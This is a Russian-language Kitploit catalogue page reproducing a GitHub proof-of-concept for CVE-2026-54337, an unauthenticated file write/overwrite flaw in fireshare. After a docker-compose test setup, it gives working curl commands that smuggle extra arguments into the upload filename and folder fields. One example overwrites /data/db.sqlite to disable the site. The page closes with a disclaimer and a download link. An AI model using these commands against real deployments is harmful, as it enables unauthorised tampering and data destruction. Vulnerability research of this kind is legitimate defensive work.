Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/4qu4r1um/cve-2026-54337-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHub4qu4r1um/cve-2026-54337-poc

CVE-2026-54337-PoC

CVE-2026-54337 - Неаутентифицированная запись/перезапись файлов PoC для fireshare <= 1.16.3

Репозиторий
22 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-54337 PoC

CVE-2026-54337 - Неаутентифицированная запись/перезапись файлов в fireshare <= 1.16.3 PoC

Для получения дополнительной информации обратитесь к этому уведомлению Github

Настройка

  • Пожалуйста, используйте следующий docker-compose.yml для тестирования
root@kitploit:~
services:
  fireshare:
    container_name: fireshare-temp
    image: shaneisrael/fireshare:1.6.13-lite

    ports:
      - "8082:80"

    # Ephemeral storage (discarded when container stops)
    tmpfs:
      - /data
      - /processed
      - /videos
      - /images

    environment:
      - ADMIN_USERNAME=admin
      - ADMIN_PASSWORD=admin123
      - SECRET_KEY=fireshare-super-secret-random-key
      - DOMAIN=
      - PUID=1000
      - PGID=1000

    restart: unless-stopped

Эксплойт

  • Шаг 1: Создайте любой файл, если вы назвали его с расширением .mp4, например
root@kitploit:~
$ echo 123 > test.mp4
  • Шаг 2: Выполните следующую команду curl (обязательно измените заполнитель)
root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=<FILE TO OVERWRITE/WRITE> -select_streams v.mp4" \
  -F "folder=testfolder -o <DIRECTORY TO PUT THE FILE>" \
  http://<URL>/api/upload/public

Например, чтобы перезаписать /data/db.sqlite, измените команду следующим образом

root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=db.sqlite -select_streams v.mp4" \
  -F "folder=testfolder -o data" \
  http://<URL>/api/upload/public

Примечание

  • По умолчанию сервис запускается под пользователем nginx, который имеет доступ только к /data, /processed, /images и /videos, поэтому вы можете записывать/перезаписывать только там
  • Из-за этого, по моему мнению, перезапись /data/db.sqlite имеет наибольшее влияние, так как сделает сайт неработоспособным

Отказ от ответственности

  • Это доказательство концепции (PoC) предоставляется только для образовательных, исследовательских и оборонительных целей безопасности.
  • Автор не несет ответственности за любое неправильное использование, ущерб, несанкционированный доступ, нарушение работы сервиса, потерю данных или юридические последствия, возникшие в результате использования этого кода. Пользователи несут единоличную ответственность за соблюдение всех применимых законов, нормативных актов и требований авторизации перед использованием этого PoC.
  • Этот PoC следует выполнять только в отношении систем, на тестирование которых у вас есть явное разрешение. Несанкционированное тестирование систем может быть незаконным и неэтичным.
  • Используя это программное обеспечение, вы подтверждаете, что делаете это на свой страх и риск.
Скачать инструмент